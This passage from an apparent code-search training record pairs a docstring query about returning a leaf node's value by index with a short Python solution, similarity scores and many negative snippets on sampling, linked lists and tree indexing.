len(N_S[c]))\n\n # Remove the edges in tree\n tree.remove_edges_from(subtree_edges)\n # Todo: This will introduce a bug if we instead replace a node.\n return (old_cliques, new_cliques, new_separators, P, N)", "def test_subsample_taxonomy(self):\n basic_test_runner(self, 'taxonomy', nrows=6, niter=3, normalize='subsample')", "def sampling_class_portion(data,classes,others=None,class_portion=None,rng=np.random.RandomState(100)):\n u, indices = np.unique(classes,return_inverse=True)\n indices=np.asarray(indices)\n num_u=len(u)\n sample_sizes=dict()\n \n # get sample size of each class\n size_min=float(\"inf\")\n for i in range(num_u):\n sample_size_this=np.sum(indices==i)\n sample_sizes[u[i]]=sample_size_this\n if class_portion[u[i]]==1 and sample_size_this<size_min:\n size_min=sample_size_this\n print(size_min)\n\n indices_all=np.array([],dtype=indices.dtype)\n indices_range=np.array(range(len(indices)))\n \n # sampling\n for i in range(num_u):\n ind_this_num=indices_range[indices==i]\n replacetf=True if sample_sizes[u[i]]<(size_min*class_portion[u[i]]) else False\n ind_this_reduced=ind_this_num[rng.choice(sample_sizes[u[i]],size=size_min*class_portion[u[i]],replace=replacetf)]\n indices_all=np.append(indices_all,ind_this_reduced)\n \n # get the sampled data \n data=data[indices_all,:]\n classes=classes[indices_all]\n if np.any(others):\n others=others[indices_all]\n return data,classes,indices_all,others", "def sample(self):", "def calculate_sample_silhouette(self):\n sum_samples = 0\n for cluster in self.cluster_lst:\n 
sum_samples += self.sum_silhouette(cluster)\n sample_size = len(self.samples)\n return sum_samples/sample_size", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n # dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sample(self, n=1):\n raise NotImplementedError", "def run_suite(strategy):\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite()\n \n # test gen_all_holds on various inputs\n hand = (1,)\n num_sides = 6\n suite.run_test(strategy(hand, num_sides), (3.5, ()), \"Test #1:\")\n\n suite.report_results()", "def sample(self, batch_size):\n # get the sum of priorities\n priority_sum = self.sum_tree.get_sum_priority()\n # sample priorities \n priorities_to_sample = np.random.uniform(0, priority_sum, batch_size)\n # get the indexes of replays\n sample_idxes = [self.sum_tree.get(x) for x in priorities_to_sample]\n # fetch the transitions and prepare the batch for training\n random_sample = [self.queue[x] for x in sample_idxes]\n # zip\n zipped = [ torch.from_numpy( np.asarray(arr).astype(np.float32) ).float() for arr in zip(*random_sample) ]\n sample = Transition( zipped[0], zipped[1].unsqueeze_(-1).long(), zipped[2].unsqueeze_(-1), zipped[3], zipped[4].unsqueeze_(-1).byte() )\n return sample, sample_idxes", "def sample_size_strat(method):\n N = 1000\n major = [value for value in range(10, 15, 2)]\n repetitions = 100\n\n p_samples = [] \n pandas_y_values = []\n pandas_x_values = []\n \n var = []\n var_strat = []\n\n for m in major:\n samples = m * m\n var1 = []\n var2_strat = []\n\n for i in range(repetitions):\n result = compute_area_mandelbrot(N, 2, samples, method)\n p_samples.append(method)\n pandas_x_values.append(str(samples))\n pandas_y_values.append(result[2])\n var1.append(result[2])\n\n result = compute_area_mandelbrot(N, 2, samples, \"Stratified Random\")\n var2_strat.append(result[2])\n p_samples.append(\"Stratified\")\n pandas_x_values.append(str(samples))\n pandas_y_values.append(result[2])\n \n var.append(var1)\n var_strat.append(var2_strat)\n\n for i in range(len(var)):\n variation = np.var(var[i])\n variation_strat = np.var(var_strat[i])\n print(\"var at sample size:\", major[i]**2)\n print(\"Area means:\", np.mean(var[i]), np.mean(var_strat[i]))\n print(f\"var {method}:\", variation)\n print(\"var stratified:\", variation_strat)\n print(f\"var {method} / Stratified = \", variation / variation_strat)\n print(\"If value is positive than anti variance is smaller\")\n \n # Create an array with the colors you want to use\n data = {'Sample size':pandas_x_values, 'Area':pandas_y_values, 'Sampling method':p_samples} \n\n sns.set(font_scale=1.1)\n\n # Create DataFrame\n df = pd.DataFrame(data) \n svm = sns.lineplot(data=data, x=\"Sample size\", y=\"Area\", hue=\"Sampling method\", color=sns.set_palette(\"Set2\"))\n svm.set_title(f\"Convergence of the estimated area with increased sample size\")\n\n plt.xticks(rotation=45)\n plt.tight_layout()\n\n figure = svm.get_figure()\n figure.savefig(f'images/samplesize/StratifiedSsize{major[0]}-{major[-1]}.png')", "def sample_one(self):\n # x = self.mean + self.sigma * np.random.normal()\n x = self.dist.sample(1)\n return x", "def sampling(train_set, train_meta, klass, label, n_samples_pos, rate_neg, fold, path_idxs):\n\tprint('-- SAMPLING TRAINNING')\n\tdirectory_idxs = 
path_idxs+fold+'/'+str(int(klass))+'/'\n\tif(os.path.isdir(directory_idxs)):\n\t\tprint('loading indexes...')\n\t\tidxs_class_pos = np.loadtxt(directory_idxs+'idxs_pos_train.txt', dtype=int)\n\t\tidxs_class_neg = np.loadtxt(directory_idxs+'idxs_neg_train.txt', dtype=int)\n\telse:\n\t\tidxs_class_pos = (train_meta[ : , label] == klass).nonzero()[0]\n\t\tidxs_class_neg = (train_meta[ : , label] != klass).nonzero()[0]\n\t\tif(n_samples_pos < len(idxs_class_pos)):\n\t\t\tidxs_class_pos = np.random.choice(idxs_class_pos, n_samples_pos)\n\t\tidxs_class_neg = np.random.choice(idxs_class_neg, int(n_samples_pos*rate_neg))\n\t\tprint('saving indexes...')\n\t\tos.makedirs(directory_idxs)\n\t\tnp.savetxt(directory_idxs+'idxs_pos_train.txt', idxs_class_pos, fmt='%d')\n\t\tnp.savetxt(directory_idxs+'idxs_neg_train.txt', idxs_class_neg, fmt='%d')\n\n\ttrain_set = np.vstack((train_set[idxs_class_pos], train_set[idxs_class_neg]))\n\ttrain_meta = np.vstack((train_meta[idxs_class_pos], train_meta[idxs_class_neg]))\n\ttrain_meta[:, label] = 1\n\ttrain_meta[len(idxs_class_pos):, label] = -1\n\treturn [train_set, train_meta]", "def data_processing_for_stratified_sampling(data:pandas.core.frame.DataFrame, split_num:int) -> pandas.core.frame.DataFrame:\n win_data = data[data.label == 'W'] # Extract only the data of label of win\n draw_data = data[data.label == 'D'] # Extract only the data of label of draw\n lose_data = data[data.label == 'L'] # Extract only the data of label of lose\n data_list = [win_data, draw_data, lose_data]\n for i,wdl_data in enumerate(data_list):\n wdl_data = data_column_conversion(wdl_data)\n wdl_data = data_randomization(wdl_data)\n if i == 0:\n separated_data_list = data_separate(wdl_data, split_num)\n else:\n separated_data_list = data_list_wdl_merge(separated_data_list, data_separate(wdl_data, split_num))\n separated_data_list = assign_group_numbers_to_data(separated_data_list)\n integrated_data = data_list_put_together(separated_data_list)\n integrated_data = data_randomization(integrated_data)\n return integrated_data", "def test_node_sampling(weighted_graph_config_fixture):\n w_config = weighted_graph_config_fixture\n\n # Node 5 to node 4 has zero weight (zero transition probability)\n # Node 4 to node 5 has ten weight (high transition probability)\n edges = pd.DataFrame({'source_content_id': [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5],\n 'destination_content_id': [5, 1, 0, 3, 4, 1, 2, 1, 3, 5, 3, 4],\n 'weight': [1, 2, 3, 4, 1, 2, 3, 4, 1, 10, 5, 0]}\n )\n wm = N2VModel()\n\n wm.create_graph(edges, w_config['weighted_graph'])\n\n wm.generate_walks(**w_config)\n\n wm.fit_model(**w_config, callbacks=EpochLogger())\n\n n_nodes = len(set(edges.source_content_id))\n n_transitions = n_nodes * (w_config['walk_length'] - 1) * w_config['num_walks']\n\n res = np.array([np.array(list(zip(x, x[1:]))).ravel() for x in wm.node2vec.walks])\n walks = np.reshape(res, (n_transitions, 2))\n\n pairs = pd.DataFrame({'state1': walks[:, 0], 'state2': walks[:, 1]})\n counts = pairs.groupby('state1')['state2'].value_counts().unstack()\n counts = counts.replace(np.nan, 0)\n assert pairs.shape == (n_nodes * (w_config['walk_length'] - 1) * w_config['num_walks'], 2)\n assert counts.iloc[5][4] == 0\n assert counts.iloc[4][5] != 0\n assert len(set(edges['source_content_id']).union(\n set(edges['destination_content_id']))) == len(wm.model.wv.vocab.keys())", "def generate_sampler(dataset, sampler_option='random', step=1):\n\n df = dataset.df\n min_age = np.min(df.age)\n max_age = np.max(df.age)\n\n if (max_age - 
min_age) % step == 0:\n max_age += step\n\n bins = np.arange(min_age, max_age, step)\n count = np.zeros(len(bins))\n for idx in df.index:\n age = df.loc[idx, \"age\"]\n key = np.argmax(np.logical_and(age - step < bins, age >= bins)).astype(int)\n count[key] += 1\n\n # weight_per_class = (1 / np.array(count)) if count.any() != 0 else 0.\n weight_per_class = np.zeros_like(count).astype(float)\n np.divide(1., count, out=weight_per_class, where=count != 0)\n weights = [0] * len(df)\n\n for idx, age in enumerate(df.age.values):\n key = np.argmax(np.logical_and(age - 5 <= bins, age > bins)).astype(int)\n weights[idx] = weight_per_class[key]\n\n weights = torch.FloatTensor(weights)\n\n if sampler_option == 'random':\n s = sampler.RandomSampler(dataset, replacement=False)\n elif sampler_option == 'weighted':\n s = sampler.WeightedRandomSampler(weights, len(weights))\n else:\n raise NotImplementedError(\"The option %s for sampler is not implemented\" % sampler_option)\n\n return s", "def sample(self, nsamples):\n return self.dist.sample(nsamples)", "def test_oss_sample_wt_fit():\n\n # Create the object\n oss = OneSidedSelection(random_state=RND_SEED)\n assert_raises(RuntimeError, oss.sample, X, Y)", "def draw_strat_sample(self, T, n, excl_idxs=None):\n\n if n == 0:\n return np.array([], dtype=np.uint)\n\n if T.size == n: # TODO: this only works if excl_idxs=None\n return np.arange(n)\n\n if n == 1:\n idxs_all_non_excl = np.setdiff1d(\n np.arange(T.size), excl_idxs, assume_unique=True\n )\n return np.array([np.random.choice(idxs_all_non_excl)])\n\n # Freedman-Diaconis rule\n h = 2 * np.subtract(*np.percentile(T, [75, 25])) / np.cbrt(n)\n n_bins = int(np.ceil((np.max(T) - np.min(T)) / h)) if h > 0 else 1\n n_bins = min(\n n_bins, n / 2\n ) # Limit number of bins to half of requested subset size.\n\n bins = np.linspace(np.min(T), np.max(T), n_bins, endpoint=False)\n idxs = np.digitize(T, bins)\n\n # Exclude restricted indices.\n if excl_idxs is not None and excl_idxs.size > 0:\n idxs[excl_idxs] = n_bins + 1 # Impossible bin.\n\n uniq_all, cnts_all = np.unique(idxs, return_counts=True)\n\n # Remove restricted bin.\n if excl_idxs is not None and excl_idxs.size > 0:\n excl_bin_idx = np.where(uniq_all == n_bins + 1)\n cnts_all = np.delete(cnts_all, excl_bin_idx)\n uniq_all = np.delete(uniq_all, excl_bin_idx)\n\n # Compute reduced bin counts.\n reduced_cnts = np.ceil(cnts_all / np.sum(cnts_all, dtype=float) * n).astype(int)\n reduced_cnts = np.minimum(\n reduced_cnts, cnts_all\n ) # limit reduced_cnts to what is available in cnts_all\n\n # Reduce/increase bin counts to desired total number of points.\n reduced_cnts_delta = n - np.sum(reduced_cnts)\n\n while np.abs(reduced_cnts_delta) > 0:\n\n # How many members can we remove from an arbitrary bucket, without any bucket with more than one member going to zero?\n max_bin_reduction = np.min(reduced_cnts[np.where(reduced_cnts > 1)]) - 1\n\n # Generate additional bin members to fill up/drain bucket counts of subset. 
This array contains (repeated) bucket IDs.\n outstanding = np.random.choice(\n uniq_all,\n min(max_bin_reduction, np.abs(reduced_cnts_delta)),\n p=(reduced_cnts - 1) / np.sum(reduced_cnts - 1, dtype=float),\n )\n uniq_outstanding, cnts_outstanding = np.unique(\n outstanding, return_counts=True\n ) # Aggregate bucket IDs.\n\n outstanding_bucket_idx = np.where(\n np.in1d(uniq_all, uniq_outstanding, assume_unique=True)\n )[\n 0\n ] # Bucket IDs to Idxs.\n reduced_cnts[outstanding_bucket_idx] += (\n np.sign(reduced_cnts_delta) * cnts_outstanding\n )\n reduced_cnts_delta = n - np.sum(reduced_cnts)\n\n # Draw examples for each bin.\n idxs_train = np.empty((0,), dtype=int)\n for uniq_idx, bin_cnt in zip(uniq_all, reduced_cnts):\n idx_in_bin_all = np.where(idxs.ravel() == uniq_idx)[0]\n idxs_train = np.append(\n idxs_train, np.random.choice(idx_in_bin_all, bin_cnt, replace=False)\n )\n return idxs_train", "def test_sampler():\n # SMC sampler with user defined L\n smc.generate_samples()\n\n # SMC sampler with approximately optimum L-kernel\n smc_opt.generate_samples()\n\n # Check estimates\n assert np.allclose(smc_opt.mean_estimate_EES[-1], p.mean, atol=0.1)\n assert np.allclose(smc_opt.var_estimate_EES[-1][0][0], p.cov[0][0],\n atol=0.2)\n assert np.allclose(smc_opt.var_estimate[-1][1][1], p.cov[1][1],\n atol=0.2)\n assert np.allclose(smc_opt.var_estimate[-1][0][1], p.cov[0][1],\n atol=0.2)\n\n # We'd expect that, on average, our SMC with optimum L-kernel should\n # maintain a higher effective sample size that our SMC sampler with a\n # 'user defined' kernel.\n\n assert np.mean(smc_opt.Neff) > np.mean(smc.Neff)", "def tree_query(self, pta_root):\n self.sul.pre()\n curr_node = pta_root\n\n inputs = []\n outputs = []\n\n while True:\n\n if curr_node.children:\n frequency_sum = sum(curr_node.input_frequencies.values())\n if frequency_sum == 0:\n # uniform sampling in case we have no information\n inp = choice(list(curr_node.children.keys()))\n else:\n # use float random rather than integers to be able to work with non-integer frequency information\n selection_value = random() * frequency_sum\n inp = None\n for i in curr_node.input_frequencies.keys():\n inp = i\n selection_value -= curr_node.input_frequencies[i]\n if selection_value <= 0:\n break\n # curr_node.input_frequencies[inp] -= 1\n\n inputs.append(inp)\n out = self.sul.step(inp)\n new_node = curr_node.get_child(inp, out)\n\n if new_node:\n outputs.append(out)\n curr_node = new_node\n else:\n self.sul.post()\n return\n else:\n curr_node = pta_root\n for i, o in zip(inputs, outputs):\n self.curr_node.input_frequencies[i] -= 1\n curr_node = curr_node.get_child(i, o)\n self.sul.post()\n return", "def costFun(self, S, x):", "def __call__(self, samples_number):\n self.sampler.sample(samples_number)", "def sampleWeight(self):\r\n x=random.random()\r\n i = 0\r\n n = len(self.weights)-1\r\n cummulativeWeight = 0\r\n #Distribute the exploration weight evenly among all the actions that have been\r\n #taken up to this point in time by any of the users\r\n if len(self.sampledActions) == 0:\r\n explorationWeight = 0\r\n else:\r\n explorationWeight = self.explorationFund / len(self.sampledActions)\r\n #Compute the normalization factor. If no action has been sampled by this user yet,\r\n #then each action k has weight eta*pi_k, where pi_k is the weight of k in the\r\n #prior distribution. 
Then, the normalization factor is the sum(eta*pi_k) for all k,\r\n #which is equal to eta*sum(pi_k), which is just eta, since the sum of the previous\r\n #weights has to add up to 1.\r\n #If one or more actions have been already sampled, the normalization factor is the\r\n #sum of 1) the weights already in self.weights, 2) the exploration fund, and 3) the\r\n #weights of the actions that are not yet in self.weights. Each one of these actions\r\n #has weight eta*pi_k (because it hasn't been sampled yet), so the total weight of the\r\n #mass of actions not yet in self.weights is eta*(1-sum(pi_l)), where the sum is over all\r\n #the weights already in self.weights\r\n if n < 0:\r\n normalizationFactor = self.priorBelief\r\n else:\r\n normalizationFactor = sum(self.weights) + self.explorationFund + \\\r\n self.priorBelief*(1-self.priorTopicDistr.cummulative[n])\r\n #Keep getting the next weight until the combined mass of the weights is less than the\r\n #random number x\r\n while True:\r\n w = self.__getitem__(i)\r\n if i in self.sampledActions:\r\n w += explorationWeight\r\n cummulativeWeight += w\r\n if x <= cummulativeWeight/normalizationFactor:\r\n if i not in self.sampledActions:\r\n self.sampledActions.append(i)\r\n return w\r\n i += 1", "def sample_tree(grid, edge_logits, edges, steps=1):\n logger.debug('sample_tree sampling a random spanning tree')\n COUNTERS.sample_tree_calls += 1\n if len(edges) <= 1:\n return edges\n tree = MutableTree(grid, edges)\n V, E, K = tree.VEK\n\n for step in range(steps):\n for e in range(E):\n e = np.random.randint(E) # Sequential scanning doesn't work.\n k1 = tree.remove_edge(e)\n valid_edges = np.where(\n tree.components[grid[1, :]] != tree.components[grid[2, :]])[0]\n valid_probs = edge_logits[valid_edges]\n valid_probs -= valid_probs.max()\n np.exp(valid_probs, out=valid_probs)\n total_prob = valid_probs.sum()\n if total_prob > 0:\n valid_probs *= 0.9999995 / total_prob # Avoid np.binom errors.\n k2 = valid_edges[sample_from_probs(valid_probs)]\n else:\n k2 = k1\n COUNTERS.sample_tree_infeasible += 1\n tree.add_edge(e, k2)\n\n COUNTERS.sample_tree_propose += 1\n COUNTERS.sample_tree_accept += (k1 != k2)\n HISTOGRAMS.sample_tree_log2_choices.update(\n [len(valid_edges).bit_length()])\n\n edges = sorted((grid[1, k], grid[2, k]) for k in tree.e2k.values())\n assert len(edges) == E\n return edges" ]
[ "0.5792323", "0.57242346", "0.5687577", "0.5676991", "0.56017643", "0.55336124", "0.54666936", "0.5430783", "0.53604496", "0.5358043", "0.530985", "0.5304589", "0.5277224", "0.5271483", "0.52695686", "0.5267166", "0.5261225", "0.52445275", "0.52442276", "0.5240669", "0.5205574", "0.5201676", "0.5198351", "0.51800835", "0.5164713", "0.51509655", "0.5133954", "0.512064", "0.510473", "0.5104595", "0.5101326", "0.5101326", "0.5082811", "0.50808877", "0.5076114", "0.5067781", "0.50436974", "0.50277203", "0.5004908", "0.5000121", "0.49991938", "0.4980979", "0.49800017", "0.49758017", "0.49701422", "0.496209", "0.49611577", "0.49559188", "0.4946537", "0.49401417", "0.49303448", "0.49279994", "0.49278066", "0.49194053", "0.4918245", "0.49167413", "0.49103525", "0.4903659", "0.49008116", "0.49005428", "0.48929334", "0.48898116", "0.48867616", "0.4885174", "0.48825604", "0.4881431", "0.48504594", "0.48432684", "0.48401403", "0.48348847", "0.48281515", "0.48227122", "0.4819628", "0.48162696", "0.48048115", "0.47972327", "0.47877783", "0.47872922", "0.47856593", "0.47815073", "0.47742954", "0.47663653", "0.47657764", "0.47655898", "0.47647786", "0.47647724", "0.47647172", "0.47607628", "0.47587818", "0.47530708", "0.47464043", "0.47410637", "0.47399023", "0.47393534", "0.47377068", "0.47217026", "0.47215486", "0.4721529", "0.4717488", "0.47172686" ]
0.76193213
0
Returns the value of the leaf node corresponding to the index.
def get(self, node_index): return self.nodes[node_index + self.low_idx]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get(self, index: int) -> int:\n node = self.get_node(index)\n if node:\n return node.val\n else:\n return -1", "def get_leaf(self, leaf_index):\n return self.__leaves_db.get(encode_int(leaf_index))", "def _value_at(self, index):\n node = self._get_node_at(index)\n if node is None:\n raise IndexError('List index out of range.')\n return node.value", "def _value_at(self, index):\n node = self._get_node_at(index)\n if node is None:\n raise IndexError('List index out of range.')\n return node.value", "def get(self, index):\n return self._get_node(index)", "def get_index(self, index):\n return self.get_node_from_index(index).data", "def value_at(self, index):\n if index==0:\n return self.head.val\n\n temp_node = self.head\n for _ in range(index):\n temp_node = temp_node.next\n return temp_node.val", "def get(self, index: Union[int, np.ndarray]) -> Union[float, np.ndarray]:\n tree_index = self.capacity + index\n return self._tree[tree_index]", "def __getitem__(self, index):\n node = self.head\n index += 1\n for level in reversed(range(self.max_levels)):\n while node.width[level] <= index:\n index -= node.width[level]\n node = node.next[level]\n return node.value", "def _get_node(self, index):\r\n\t\tself._validate_index(index)\r\n\t\treturn self._traverse(lambda i, list: i < index)[\"node\"]", "def value_at(self, index):\n if self.empty():\n return \"Linked List Empty\"\n\n idx = 1\n l = self.head\n while l.next is not None:\n if idx is index:\n break\n\n l = l.next\n idx += 1\n return l.data", "def get_value_by_index(self, index):\n return self['value'][index]", "def getNode(self, index):\n return self.nodes[index]", "def get(self, index=0):\n\n # Error case: Index out of acceptable range\n if index < 0 or index >= self._size:\n raise RangeError(\"index out of range.\")\n\n i = 0\n current_node = self._head\n\n while(i < index):\n current_node = current_node.next\n i += 1\n\n return current_node.value", "def getvalue(self, index):\n self._checkIndex(index)\n return self._items[index].value", "def get_node_value(self, n):\n node = self.get_node(n)\n if node:\n return node.value", "def value_for_index(self, index):\r\n return self[self.keyOrder[index]]", "def child(self, index):\n raise AttributeError, \"Cannot retrieve children from leaf nodes! 
Attempted on leaf:\\n\\n%s\" % self.prettyPrint()", "def __getitem__(self, index: int) -> T:\n node_at_index = self.__get_node_at_index(index)\n return node_at_index.item", "def get_leaf_index(self, leaf_hash):\n raw_index = self.__index_db.get(leaf_hash)\n if raw_index:\n return decode_int(raw_index)\n else:\n return -1", "def get(self, index):\n if index < 0 or index >= self.length:\n return -1\n curr = self.head\n for i in range(1, index + 1):\n curr = curr.next\n return curr.val", "def get_cell_value(self, index):\n x, y = index\n return self.grid[y][x]", "def get(self, index):\n if index < 0 or index >= self._size:\n return -1\n\n current = self._head\n for _ in range(index):\n current = current.next\n return current.val", "def get_by_index_key(self, index, key=str):\n return str(self.get(key, self.get_all_childname(key)[index]))", "def get(self, index):\n cur = self.head\n while cur and index>0:\n cur = cur.next\n index -= 1\n if cur:\n return cur.val\n else:\n return -1", "def get(self, index):\r\n if index >= self.length():\r\n print(\"ERROR\")\r\n return None\r\n current_index = 0\r\n current_node = self.head\r\n while True:\r\n current_node = current_node.next\r\n if current_index == index: return current_node.data\r\n current_index += 1", "def get(self, index: int) -> int:\n cnt = 0\n cur = self.head \n while cur != None:\n if(cnt == index):\n return cur.val\n cur = cur.next \n cnt += 1\n return -1", "def get(self, index):\n return self._node.attributes.get_public(index)", "def get(self, index):\n if index >= self.len:\n return -1\n p = self.head.next\n while index > 0:\n index -= 1\n p = p.next\n return p.val", "def read_index(self, index):\n current = self.head\n if index == 0:\n return current.data\n elif index >= self.size() :\n return None\n else:\n position = 0\n while position < index:\n current = current.next_node\n position += 1\n return current.data", "def get(self, index):\n if index < 0 or index >= self.size:\n return -1\n\n if self.head is None:\n return -1\n\n curr = self.head\n for i in range(index):\n curr = curr.next\n return curr.val", "def dist_from_root(self, index):\n if index == 0:\n return 0\n return self.dist_from_root(self.parent(index)) + 1", "def get_dna_value(self, index: int):\n return self.dna[index]", "def root_value(self):\n return self.__root.get_value()", "def get(self, index):\n\n return self.values[index]", "def unit_at(self, index):\n return self.child_at(index)", "def root_index(self):\n if self.is_binary_tree:\n return 0\n return -1", "def get_key(self, proxy_index):\n return self.treeItem(proxy_index)", "def get(self, index: int) -> int:\n if index < 0 or self.size <= index:\n return -1\n curr = self.head\n for _ in range(index + 1):\n curr = curr.next\n return curr.value", "def get(self, index):\n \n cur = self.head\n i = 0\n while i < index and cur:\n cur = cur.nxt\n i+=1\n# self.display(\"get , fetching the value at index \"+str(index)) \n if cur:\n print(\"found value %d\" %cur.val)\n return cur.val\n else:\n return -1", "def getWeightValue(self, index):\r\n\t\treturn None", "def findIndex(self, index):\n if(self._root != None):\n return self._findIndex(index, self._root)\n else:\n return None", "def FindLeafNode(self, node, index):\n if node.start > index or node.end() <= index:\n if self.debug:\n print node.ToPrettyString();\n print index;\n raise ValueError(\"Node don't contain index\");\n if node.start == index and node.level == 0: return node;\n if not node.children:\n raise ValueError(\"Didn't find the index\");\n for child in 
node.children:\n if child.start <= index and child.end() > index:\n return self.FindLeafNode(child, index);\n if self.debug:\n print node.ToPrettyString();\n print index;\n print \"node.start=%d\" % node.start;\n print \"node.end=%d\" % node.end();\n raise ValueError(\"Shouldn't reach the end\");", "def getNode_at(self, index):\n if self.empty():\n return \"Linked List Empty\"\n\n idx = 1\n l = self.head\n while l.next is not None:\n if idx is index:\n break\n\n l = l.next\n idx += 1\n return l", "def get_left_child(self, index):\n return self.heap[self.get_left_child_index(index)]", "def value(self):\n return self.node_value", "def index(self):\n return self._ll_tree.get_index()", "def get_value(self, entity, Pid, index):\n value = entity.data['claims'][Pid][index]['mainsnak']['datavalue']['value']\n return value", "def get_node(self, selector, index):\n\n self.arbor._setup_tree(self)\n self.arbor._grow_tree(self)\n indices = getattr(self, f\"_{selector}_field_indices\", None)\n if indices is None:\n raise RuntimeError(\"Bad selector.\")\n\n my_link = self.root._links[indices][index]\n return self.arbor._generate_tree_node(self.root, my_link)", "def get(self, subtree_sum):\n idx = 0\n while True:\n # if idx is a leaf node return the idx and the value\n if idx >= self.__capacity - 1:\n return (idx - self.__capacity + 1, self.__tree[idx])\n\n # else continue down\n left = 2 * idx + 1\n right = 2 * idx + 2\n left_sum = self.__tree[left]\n if left_sum >= subtree_sum:\n idx = left\n else:\n idx = right\n subtree_sum -= left_sum", "def value(self, index):\n\n return self._ax.value(index)", "def get(self, index: int) -> int:\n if index + 1 >self.cnt:\n return -1\n\n tmp = self.dummy\n for i in range(index+1):\n tmp = tmp.next\n return tmp.val", "def get_right_child(self, index):\n return self.heap[self.get_right_child_index(index)]", "def get_parent(self, index):\n return (index - 1) // (2)", "def get(self,root,key):\n node = root\n for digit in key:\n node = node.children[ord(digit)-ord('0')]\n if(node==None):\n return None\n return node.value.value", "def get(self, index):\n if 0 <= index <= len(self.nums):\n return self.nums[index]\n return -1", "def get(self, index: int) -> int:\n if index < 0 or index >= self.size: return -1\n \n # choose search from head or tail\n if index + 1 < self.size - index:\n ptr = self.head\n for _ in range(index + 1):\n ptr = ptr.next\n else: # from tail\n ptr = self.tail\n for _ in range(self.size - index):\n ptr = ptr.prev\n return ptr.val", "def get(self, index: int) -> int:\n curr = self.head\n count = 0\n if self.head is None:\n return -1\n if index == 0:\n return self.head.data\n while curr:\n if count == index:\n return curr.data\n count += 1\n curr = curr.next\n return -1", "def get(self, index):\n assert isinstance(index, np.ndarray)\n return self.weight[index]", "def __getitem__(self, key):\n if self._root:\n node = self._getItemHelper(key, self._root)\n if node:\n return node.value\n else:\n return None\n else:\n return None", "def left_child(self, index):\n return 2 * index + 1", "def get_parent(self, index):\n return self.heap[self.get_parent_index(index)]", "def __getitem__(self, index):\n return self._value_at(index)", "def __getitem__(self, index):\n return self._value_at(index)", "def left_child(self, index):\n return 2 * index", "def get_node(self, index: int) -> Optional[Node]:\r\n return self._nodes.get(index)", "def get_parent_index(index):\n if index == 0:\n return 0\n if index % 2 == 0:\n return int(index / 2 - 1)\n return int(index / 2)", 
"def right(self, index):\n try:\n if index == self.root_index():\n index = self.adjacency_list[index][1]\n else:\n index = self.adjacency_list[index][2]\n return index\n except IndexError:\n return -1", "def _GetSingleValue(self, node_idx, *attributes):\n raise NotImplementedError", "def _root(self, ind):\n while (ind != self._id[ind]):\n ind = self._id[ind]\n return ind", "def value(self):\n return self.get_attribute(\"value\", str(self.children))", "def left(self, index):\n try:\n if index == self.root_index():\n index = self.adjacency_list[index][0]\n else:\n index = self.adjacency_list[index][1]\n return index\n except IndexError:\n return -1", "def get(self, index):\n raise NotImplementedError() # pragma: no cover", "def item_at_index(self, index):\n if index < 0 or index >= self.size:\n return -1\n\n if self.head is None:\n return -1\n\n curr = self.head\n for i in range(index):\n curr = curr.next\n return curr.val", "def label_from_index(self, index):\n assert self.labels is not None, \"Labels not processed\"\n return self.labels[index]", "def get(self, index):\n count = 0\n x = self.begin\n\n while count != index:\n x = x.next\n count += 1\n\n return x.value", "def _parent(self, index):\r\n # Declaring the \"root\" its own parent, otherwise usual math\r\n return (index - 1) // 2 if index else 0", "def lookupVal(self, val):\n pybtlib.lookupVal.restype = ctypes.c_int\n pybtlib.lookupVal.argtypes = [ctypes.POINTER(Tree), ctypes.c_int]\n return pybtlib.lookupVal(ctypes.byref(self), val)", "def fromIndex(index):\n return Data.labels[index]", "def parent(self, index):\n return index / 2", "def node_index(self, key):\n return self._key_to_node_index[key]", "def GetSubkeyByIndex(self, index):", "def _get_node_at(self, index):\n assert isinstance(index, int) \n if index >= 0: \n steps = index \n else:\n steps = self.size() + index\n if steps < 0:\n return None \n node = self.head\n while steps > 0 and node is not None:\n node = node.next_node\n steps -= 1 \n return node", "def get_offset(self, index):\n if self.is_leaf():\n raise TerminalNodeException\n try:\n return self.offsets[index]\n except KeyError:\n return None", "def left_child_idx(idx):\n return (idx << 1) + 1", "def root(tree):\n\n return tree[0]", "def parent(self, index):\n if index == 0:\n return -1\n return self.adjacency_list[index][0]", "def __get_node_at_index(self, index: int) -> Node[T]:\n if 0 <= index and index < len(self):\n current = self.head\n for i in range(index):\n current = current.link\n return current\n else:\n raise ValueError(\"Index out of bounds\")", "def right_child(self, index):\n return 2 * index + 1", "def _get_node_at(self, index):\n assert isinstance(index, int)\n from_head = True if index >= 0 else False \n if from_head: \n node = self.head\n steps = index \n else:\n node = self.tail \n steps = abs(index) -1 \n while steps > 0 and node is not None:\n node = node.next_node if from_head else node.prev_node \n steps -= 1 \n return node", "def __getitem__(self, item: int) -> int:\n return self.root[item].key", "def max_child(self, index):\n # left and right child\n left = self._data[(index*2)+1] if (index*2)+1 < len(self) else None\n right = self._data[(index*2)+2] if (index*2)+2 < len(self) else None\n\n # if has both children\n if left and right:\n if left < right:\n return (index*2)+2\n return (index*2)+1\n\n # if only has left child\n elif left and right is None:\n return (index*2)+1\n\n # if only has right child\n elif right and left is None:\n return (index*2)+2\n\n # no children\n return None", 
"def draw_leaf_value(self, idx_data_points):\n R_j = self.get_residuals()[idx_data_points]\n draw = self.mean(R_j)\n return draw", "def getIndex(self, *args):\n return _libsbml.XMLNode_getIndex(self, *args)", "def select(self, index, source=None):\n if index > self.root.size_tree or index <= 0:\n raise IndexError(\"The index is out of range!\")\n\n check_node = self.root if not source else source\n\n while True:\n size_left_tree = check_node.left_child.size_tree\n if size_left_tree == index - 1:\n break\n elif size_left_tree >= index:\n check_node = check_node.left_child\n else:\n check_node = self.select(index - size_left_tree - 1, source=check_node.right_child)\n break\n\n return check_node", "def value(self, idx):\n item = self.items[idx]\n if item is None:\n ret = -float('inf')\n else:\n ret = self.fn(item)\n return ret", "def get_first(self) -> object:\n if self.root is None: # If tree is empty\n return None\n\n return self.root.value # Returning root value", "def select(self, index, source=None):\r\n if index > self.root.size_tree or index <= 0:\r\n raise IndexError(\"The index is out of range!\")\r\n\r\n check_node = self.root if not source else source\r\n\r\n while True:\r\n size_left_tree = check_node.left_child.size_tree\r\n if size_left_tree == index - 1:\r\n break\r\n elif size_left_tree >= 